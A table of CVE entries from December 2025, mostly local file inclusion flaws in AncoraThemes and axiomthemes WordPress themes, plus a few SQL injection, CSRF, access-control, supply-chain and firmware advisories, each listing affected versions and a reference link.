| AncoraThemes--Sanger | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Sanger sanger allows PHP Local File Inclusion.This issue affects Sanger: from n/a through <= 1.24.0. | 2025-12-18 | not yet calculated | CVE-2025-58891 | https://vdp.patchstack.com/database/Wordpress/Theme/sanger/vulnerability/wordpress-sanger-theme-1-24-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Tourimo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Tourimo tourimo allows PHP Local File Inclusion.This issue affects Tourimo: from n/a through <= 1.2.3. | 2025-12-18 | not yet calculated | CVE-2025-58892 | https://vdp.patchstack.com/database/Wordpress/Theme/tourimo/vulnerability/wordpress-tourimo-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Alright | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Alright alright allows PHP Local File Inclusion.This issue affects Alright: from n/a through <= 1.6.1. | 2025-12-18 | not yet calculated | CVE-2025-58893 | https://vdp.patchstack.com/database/Wordpress/Theme/alright/vulnerability/wordpress-alright-theme-1-6-1-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Good Mood | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Good Mood good-mood allows PHP Local File Inclusion.This issue affects Good Mood: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58894 | https://vdp.patchstack.com/database/Wordpress/Theme/good-mood/vulnerability/wordpress-good-mood-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Integro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Integro integro allows PHP Local File Inclusion.This issue affects Integro: from n/a through <= 1.8.0. | 2025-12-18 | not yet calculated | CVE-2025-58895 | https://vdp.patchstack.com/database/Wordpress/Theme/integro/vulnerability/wordpress-integro-theme-1-8-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Otaku | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Otaku otaku allows PHP Local File Inclusion.This issue affects Otaku: from n/a through <= 1.8.0. | 2025-12-18 | not yet calculated | CVE-2025-58896 | https://vdp.patchstack.com/database/Wordpress/Theme/otaku/vulnerability/wordpress-otaku-theme-1-8-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--HealthHub | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes HealthHub healthhub allows PHP Local File Inclusion.This issue affects HealthHub: from n/a through <= 1.3.0. | 2025-12-18 | not yet calculated | CVE-2025-58898 | https://vdp.patchstack.com/database/Wordpress/Theme/healthhub/vulnerability/wordpress-healthhub-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Frame | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Frame frame allows PHP Local File Inclusion.This issue affects Frame: from n/a through <= 2.4.0. | 2025-12-18 | not yet calculated | CVE-2025-58899 | https://vdp.patchstack.com/database/Wordpress/Theme/frame/vulnerability/wordpress-frame-theme-2-4-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--UniTravel | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes UniTravel unitravel allows PHP Local File Inclusion.This issue affects UniTravel: from n/a through <= 1.4.2. | 2025-12-18 | not yet calculated | CVE-2025-58900 | https://vdp.patchstack.com/database/Wordpress/Theme/unitravel/vulnerability/wordpress-unitravel-theme-1-4-2-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Takeout | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Takeout takeout allows PHP Local File Inclusion.This issue affects Takeout: from n/a through <= 1.3.0. | 2025-12-18 | not yet calculated | CVE-2025-58901 | https://vdp.patchstack.com/database/Wordpress/Theme/takeout/vulnerability/wordpress-takeout-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Critique | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Critique critique allows PHP Local File Inclusion.This issue affects Critique: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-58923 | https://vdp.patchstack.com/database/Wordpress/Theme/critique/vulnerability/wordpress-critique-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Neptunus | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Neptunus neptunus allows PHP Local File Inclusion.This issue affects Neptunus: from n/a through <= 1.0.11. | 2025-12-18 | not yet calculated | CVE-2025-58925 | https://vdp.patchstack.com/database/Wordpress/Theme/neptunus/vulnerability/wordpress-neptunus-theme-1-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Cerebrum | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Cerebrum cerebrum allows PHP Local File Inclusion.This issue affects Cerebrum: from n/a through <= 1.12. | 2025-12-18 | not yet calculated | CVE-2025-58926 | https://vdp.patchstack.com/database/Wordpress/Theme/cerebrum/vulnerability/wordpress-cerebrum-theme-1-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Stallion | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Stallion stallion allows PHP Local File Inclusion.This issue affects Stallion: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-58927 | https://vdp.patchstack.com/database/Wordpress/Theme/stallion/vulnerability/wordpress-stallion-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Heart | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Heart heart allows PHP Local File Inclusion.This issue affects Heart: from n/a through <= 1.8. | 2025-12-18 | not yet calculated | CVE-2025-58928 | https://vdp.patchstack.com/database/Wordpress/Theme/heart/vulnerability/wordpress-heart-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Pantry | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pantry pantry allows PHP Local File Inclusion.This issue affects Pantry: from n/a through <= 1.4. | 2025-12-18 | not yet calculated | CVE-2025-58929 | https://vdp.patchstack.com/database/Wordpress/Theme/pantry/vulnerability/wordpress-pantry-theme-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--FitFlex | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes FitFlex fitflex allows PHP Local File Inclusion.This issue affects FitFlex: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-58930 | https://vdp.patchstack.com/database/Wordpress/Theme/fitflex/vulnerability/wordpress-fitflex-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Palatio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Palatio palatio allows PHP Local File Inclusion.This issue affects Palatio: from n/a through <= 1.6. | 2025-12-18 | not yet calculated | CVE-2025-58931 | https://vdp.patchstack.com/database/Wordpress/Theme/palatio/vulnerability/wordpress-palatio-theme-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Prisma | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Prisma prisma allows PHP Local File Inclusion.This issue affects Prisma: from n/a through <= 1.10. | 2025-12-18 | not yet calculated | CVE-2025-58932 | https://vdp.patchstack.com/database/Wordpress/Theme/prisma/vulnerability/wordpress-prisma-theme-1-10-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Anubis | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Anubis anubis allows PHP Local File Inclusion.This issue affects Anubis: from n/a through <= 1.25. | 2025-12-18 | not yet calculated | CVE-2025-58933 | https://vdp.patchstack.com/database/Wordpress/Theme/anubis/vulnerability/wordpress-anubis-theme-1-25-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--The Gig | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes The Gig thegig allows PHP Local File Inclusion.This issue affects The Gig: from n/a through <= 1.18.0. | 2025-12-18 | not yet calculated | CVE-2025-58934 | https://vdp.patchstack.com/database/Wordpress/Theme/thegig/vulnerability/wordpress-the-gig-theme-1-18-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Lunna | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Lunna lunna allows PHP Local File Inclusion.This issue affects Lunna: from n/a through <= 1.15. | 2025-12-18 | not yet calculated | CVE-2025-58935 | https://vdp.patchstack.com/database/Wordpress/Theme/lunna/vulnerability/wordpress-lunna-theme-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Catamaran | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catamaran catamaran allows PHP Local File Inclusion.This issue affects Catamaran: from n/a through <= 1.15. | 2025-12-18 | not yet calculated | CVE-2025-58936 | https://vdp.patchstack.com/database/Wordpress/Theme/catamaran/vulnerability/wordpress-catamaran-theme-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Tacticool | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Tacticool tacticool allows PHP Local File Inclusion.This issue affects Tacticool: from n/a through <= 1.0.13. | 2025-12-18 | not yet calculated | CVE-2025-58937 | https://vdp.patchstack.com/database/Wordpress/Theme/tacticool/vulnerability/wordpress-tacticool-theme-1-0-13-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeAtelier--IDonatePro | Missing Authorization vulnerability in ThemeAtelier IDonatePro idonate-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects IDonatePro: from n/a through <= 2.1.9. | 2025-12-18 | not yet calculated | CVE-2025-58938 | https://vdp.patchstack.com/database/Wordpress/Plugin/idonate-pro/vulnerability/wordpress-idonatepro-plugin-2-1-9-broken-access-control-vulnerability-2?_s_id=cve |
| axiomthemes--Basil | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Basil basil allows PHP Local File Inclusion.This issue affects Basil: from n/a through <= 1.3.12. | 2025-12-18 | not yet calculated | CVE-2025-58940 | https://vdp.patchstack.com/database/Wordpress/Theme/basil/vulnerability/wordpress-basil-theme-1-3-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Fabric | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Fabric fabric allows PHP Local File Inclusion.This issue affects Fabric: from n/a through <= 1.5.0. | 2025-12-18 | not yet calculated | CVE-2025-58941 | https://vdp.patchstack.com/database/Wordpress/Theme/fabric/vulnerability/wordpress-fabric-theme-1-5-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Dwell | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Dwell dwell allows PHP Local File Inclusion.This issue affects Dwell: from n/a through <= 1.7.0. | 2025-12-18 | not yet calculated | CVE-2025-58942 | https://vdp.patchstack.com/database/Wordpress/Theme/dwell/vulnerability/wordpress-dwell-theme-1-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Agricola | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Agricola agricola allows PHP Local File Inclusion.This issue affects Agricola: from n/a through <= 1.1.0. | 2025-12-18 | not yet calculated | CVE-2025-58943 | https://vdp.patchstack.com/database/Wordpress/Theme/agricola/vulnerability/wordpress-agricola-theme-1-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Manufactory | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Manufactory manufactory allows PHP Local File Inclusion.This issue affects Manufactory: from n/a through <= 1.4. | 2025-12-18 | not yet calculated | CVE-2025-58944 | https://vdp.patchstack.com/database/Wordpress/Theme/manufactory/vulnerability/wordpress-manufactory-theme-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--EcoGrow | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes EcoGrow ecogrow allows PHP Local File Inclusion.This issue affects EcoGrow: from n/a through <= 1.7. | 2025-12-18 | not yet calculated | CVE-2025-58945 | https://vdp.patchstack.com/database/Wordpress/Theme/ecogrow/vulnerability/wordpress-ecogrow-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Vocal | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Vocal vocal allows PHP Local File Inclusion.This issue affects Vocal: from n/a through <= 1.12. | 2025-12-18 | not yet calculated | CVE-2025-58946 | https://vdp.patchstack.com/database/Wordpress/Theme/vocal/vulnerability/wordpress-vocal-theme-1-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Athos | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Athos athos allows PHP Local File Inclusion.This issue affects Athos: from n/a through <= 1.9. | 2025-12-18 | not yet calculated | CVE-2025-58947 | https://vdp.patchstack.com/database/Wordpress/Theme/athos/vulnerability/wordpress-athos-theme-1-9-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Aromatica | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Aromatica aromatica allows PHP Local File Inclusion.This issue affects Aromatica: from n/a through <= 1.8. | 2025-12-18 | not yet calculated | CVE-2025-58948 | https://vdp.patchstack.com/database/Wordpress/Theme/aromatica/vulnerability/wordpress-aromatica-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Spock | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Spock spock allows PHP Local File Inclusion.This issue affects Spock: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-58949 | https://vdp.patchstack.com/database/Wordpress/Theme/spock/vulnerability/wordpress-spock-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Lione | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Lione lione allows PHP Local File Inclusion.This issue affects Lione: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-58950 | https://vdp.patchstack.com/database/Wordpress/Theme/lione/vulnerability/wordpress-lione-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| smartcms--Advance Seat Reservation Management for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in smartcms Advance Seat Reservation Management for WooCommerce scw-seat-reservation allows SQL Injection.This issue affects Advance Seat Reservation Management for WooCommerce: from n/a through <= 3.1. | 2025-12-18 | not yet calculated | CVE-2025-58951 | https://vdp.patchstack.com/database/Wordpress/Plugin/scw-seat-reservation/vulnerability/wordpress-advance-seat-reservation-management-for-woocommerce-plugin-3-1-sql-injection-vulnerability?_s_id=cve |
| loopus--WP Attractive Donations System - Easy Stripe & Paypal donations | Cross-Site Request Forgery (CSRF) vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Cross Site Request Forgery.This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25. | 2025-12-16 | not yet calculated | CVE-2025-58999 | https://vdp.patchstack.com/database/Wordpress/Plugin/WP_AttractiveDonationsSystem/vulnerability/wordpress-wp-attractive-donations-system-easy-stripe-paypal-donations-plugin-1-25-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThemeNectar--Salient Core | Missing Authorization vulnerability in ThemeNectar Salient Core salient-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Salient Core: from n/a through <= 3.0.8. | 2025-12-16 | not yet calculated | CVE-2025-59001 | https://vdp.patchstack.com/database/Wordpress/Plugin/salient-core/vulnerability/wordpress-salient-core-plugin-3-0-8-broken-access-control-vulnerability?_s_id=cve |
| Astoundify--Listify | Cross-Site Request Forgery (CSRF) vulnerability in Astoundify Listify listify allows Cross Site Request Forgery.This issue affects Listify: from n/a through <= 3.2.5. | 2025-12-16 | not yet calculated | CVE-2025-59009 | https://vdp.patchstack.com/database/Wordpress/Theme/listify/vulnerability/wordpress-listify-theme-3-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jthemes--Sale! Immigration law, Visa services support, Migration Agent Consulting | Incorrect Privilege Assignment vulnerability in Jthemes Sale! Immigration law, Visa services support, Migration Agent Consulting immiex allows Privilege Escalation.This issue affects Sale! Immigration law, Visa services support, Migration Agent Consulting: from n/a through <= 1.5.8. | 2025-12-18 | not yet calculated | CVE-2025-59134 | https://vdp.patchstack.com/database/Wordpress/Theme/immiex/vulnerability/wordpress-sale-immigration-law-visa-services-support-migration-agent-consulting-theme-1-5-8-privilege-escalation-vulnerability?_s_id=cve |
| ASUS--live update | Certain versions of the ASUS Live Update client were distributed with unauthorized modifications introduced through a supply chain compromise. The modified builds could cause devices meeting specific targeting conditions to perform unintended actions. Only devices that met these conditions and installed the compromised versions were affected. The Live Update client has already reached End-of-Support (EOS) in October 2021, and no currently supported devices or products are affected by this issue. | 2025-12-17 | not yet calculated | CVE-2025-59374 | https://www.asus.com/news/hqfgvuyz6uyayje1/ |
| QNAP Systems Inc.--QTS | An authentication bypass by spoofing vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to access resources which are not otherwise accessible without proper authentication. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later QuTS hero h5.2.7.3297 build 20251024 and later QuTS hero h5.3.1.3292 build 20251024 and later | 2025-12-16 | not yet calculated | CVE-2025-59385 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| Inaba Denki Sangyo Co., Ltd.--CHOCO TEI WATCHER mini (IB-MCT001) | CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper restriction of rendered UI layers or frames. If a user clicks on content on a malicious web page while logged into the product, unintended operations may be performed on the product. | 2025-12-16 | not yet calculated | CVE-2025-59479 | https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf https://jvn.jp/en/vu/JVNVU92827367/ |
| nanomq--nanomq | NanoMQ is a messaging broker/bus for IoT Edge & SDV. Versions prior to 0.24.4 have a buffer overflow case while the PUBLISH packets trigger both shared subscription and vanila subscription. This is fixed in version 0.24.4. As a workaround, disable shared subscription. | 2025-12-15 | not yet calculated | CVE-2025-59947 | https://github.com/nanomq/nanomq/security/advisories/GHSA-98f4-cmg8-x7f3 https://github.com/nanomq/nanomq/issues/2110 https://github.com/nanomq/nanomq/commit/5f5581054bb92f102cf99251e8af2f43763d457b |
| AncoraThemes--Chinchilla | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Chinchilla chinchilla allows PHP Local File Inclusion.This issue affects Chinchilla: from n/a through <= 1.16. | 2025-12-18 | not yet calculated | CVE-2025-60042 | https://vdp.patchstack.com/database/Wordpress/Theme/chinchilla/vulnerability/wordpress-chinchilla-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Wanderic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Wanderic wanderic allows PHP Local File Inclusion.This issue affects Wanderic: from n/a through <= 1.0.10. | 2025-12-18 | not yet calculated | CVE-2025-60043 | https://vdp.patchstack.com/database/Wordpress/Theme/wanderic/vulnerability/wordpress-wanderic-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Fribbo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fribbo fribbo allows PHP Local File Inclusion.This issue affects Fribbo: from n/a through <= 1.1.0. | 2025-12-18 | not yet calculated | CVE-2025-60044 | https://vdp.patchstack.com/database/Wordpress/Theme/fribbo/vulnerability/wordpress-fribbo-theme-1-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeAtelier--IDonatePro | Missing Authorization vulnerability in ThemeAtelier IDonatePro idonate-pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects IDonatePro: from n/a through <= 2.1.11. | 2025-12-18 | not yet calculated | CVE-2025-60045 | https://vdp.patchstack.com/database/Wordpress/Plugin/idonate-pro/vulnerability/wordpress-idonatepro-plugin-2-1-11-broken-access-control-vulnerability?_s_id=cve |
| axiomthemes--HeartStar | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes HeartStar heartstar allows PHP Local File Inclusion.This issue affects HeartStar: from n/a through <= 1.0.14. | 2025-12-18 | not yet calculated | CVE-2025-60046 | https://vdp.patchstack.com/database/Wordpress/Theme/heartstar/vulnerability/wordpress-heartstar-theme-1-0-14-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--IPharm | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes IPharm ipharm allows PHP Local File Inclusion.This issue affects IPharm: from n/a through <= 1.2.3. | 2025-12-18 | not yet calculated | CVE-2025-60047 | https://vdp.patchstack.com/database/Wordpress/Theme/ipharm/vulnerability/wordpress-ipharm-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Tripster | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Tripster tripster allows PHP Local File Inclusion.This issue affects Tripster: from n/a through <= 1.0.10. | 2025-12-18 | not yet calculated | CVE-2025-60048 | https://vdp.patchstack.com/database/Wordpress/Theme/tripster/vulnerability/wordpress-tripster-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Soleil | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Soleil soleil allows PHP Local File Inclusion.This issue affects Soleil: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-60049 | https://vdp.patchstack.com/database/Wordpress/Theme/soleil/vulnerability/wordpress-soleil-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Panda | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Panda panda allows PHP Local File Inclusion.This issue affects Panda: from n/a through <= 1.21. | 2025-12-18 | not yet calculated | CVE-2025-60050 | https://vdp.patchstack.com/database/Wordpress/Theme/panda/vulnerability/wordpress-panda-theme-1-21-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Rare Radio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Rare Radio rareradio allows PHP Local File Inclusion.This issue affects Rare Radio: from n/a through <= 1.0.15.1. | 2025-12-18 | not yet calculated | CVE-2025-60051 | https://vdp.patchstack.com/database/Wordpress/Theme/rareradio/vulnerability/wordpress-rare-radio-theme-1-0-15-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--W&D | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes W&D wd allows PHP Local File Inclusion.This issue affects W&D: from n/a through <= 1.0. | 2025-12-18 | not yet calculated | CVE-2025-60052 | https://vdp.patchstack.com/database/Wordpress/Theme/wd/vulnerability/wordpress-w-d-theme-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--MaxCube | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes MaxCube maxcube allows PHP Local File Inclusion.This issue affects MaxCube: from n/a through <= 1.3.1. | 2025-12-18 | not yet calculated | CVE-2025-60053 | https://vdp.patchstack.com/database/Wordpress/Theme/maxcube/vulnerability/wordpress-maxcube-theme-1-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--OnLeash | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes OnLeash onleash allows PHP Local File Inclusion.This issue affects OnLeash: from n/a through <= 1.5.2. | 2025-12-18 | not yet calculated | CVE-2025-60054 | https://vdp.patchstack.com/database/Wordpress/Theme/onleash/vulnerability/wordpress-onleash-theme-1-5-2-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Fabrica | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fabrica fabrica allows PHP Local File Inclusion.This issue affects Fabrica: from n/a through <= 1.8.1. | 2025-12-18 | not yet calculated | CVE-2025-60055 | https://vdp.patchstack.com/database/Wordpress/Theme/fabrica/vulnerability/wordpress-fabrica-theme-1-8-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Winger | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Winger winger allows PHP Local File Inclusion.This issue affects Winger: from n/a through <= 1.0.16. | 2025-12-18 | not yet calculated | CVE-2025-60056 | https://vdp.patchstack.com/database/Wordpress/Theme/winger/vulnerability/wordpress-winger-theme-1-0-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--DJ Rainflow | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes DJ Rainflow dj-rainflow allows PHP Local File Inclusion.This issue affects DJ Rainflow: from n/a through <= 1.3.13. | 2025-12-18 | not yet calculated | CVE-2025-60057 | https://vdp.patchstack.com/database/Wordpress/Theme/dj-rainflow/vulnerability/wordpress-dj-rainflow-theme-1-3-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--DetailX | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes DetailX detailx allows PHP Local File Inclusion.This issue affects DetailX: from n/a through <= 1.10.0. | 2025-12-18 | not yet calculated | CVE-2025-60058 | https://vdp.patchstack.com/database/Wordpress/Theme/detailx/vulnerability/wordpress-detailx-theme-1-10-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--smart SEO | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes smart SEO smartSEO allows PHP Local File Inclusion.This issue affects smart SEO: from n/a through <= 2.12. | 2025-12-18 | not yet calculated | CVE-2025-60059 | https://vdp.patchstack.com/database/Wordpress/Theme/smartSEO/vulnerability/wordpress-smart-seo-theme-2-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Pubzinne | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pubzinne pubzinne allows PHP Local File Inclusion.This issue affects Pubzinne: from n/a through <= 1.0.12. | 2025-12-18 | not yet calculated | CVE-2025-60060 | https://vdp.patchstack.com/database/Wordpress/Theme/pubzinne/vulnerability/wordpress-pubzinne-theme-1-0-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Kicker | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Kicker kicker allows PHP Local File Inclusion.This issue affects Kicker: from n/a through <= 2.2.0. | 2025-12-18 | not yet calculated | CVE-2025-60061 | https://vdp.patchstack.com/database/Wordpress/Theme/kicker/vulnerability/wordpress-kicker-theme-2-2-0-local-file-inclusion-vulnerability?_s_id=cve |
| mmetrodw--tPlayer | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in mmetrodw tPlayer tplayer-html5-audio-player-with-playlist allows SQL Injection.This issue affects tPlayer: from n/a through <= 1.2.1.6. | 2025-12-18 | not yet calculated | CVE-2025-60062 | https://vdp.patchstack.com/database/Wordpress/Plugin/tplayer-html5-audio-player-with-playlist/vulnerability/wordpress-tplayer-plugin-1-2-1-6-sql-injection-vulnerability?_s_id=cve |
| axiomthemes--Rosalinda | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rosalinda rosalinda allows PHP Local File Inclusion.This issue affects Rosalinda: from n/a through <= 1.2.3. | 2025-12-18 | not yet calculated | CVE-2025-60063 | https://vdp.patchstack.com/database/Wordpress/Theme/rosalinda/vulnerability/wordpress-rosalinda-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Renewal | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Renewal renewal allows PHP Local File Inclusion.This issue affects Renewal: from n/a through <= 1.2.2. | 2025-12-18 | not yet calculated | CVE-2025-60064 | https://vdp.patchstack.com/database/Wordpress/Theme/renewal/vulnerability/wordpress-renewal-theme-1-2-2-local-file-inclusion-vulnerability?_s_id=cve |
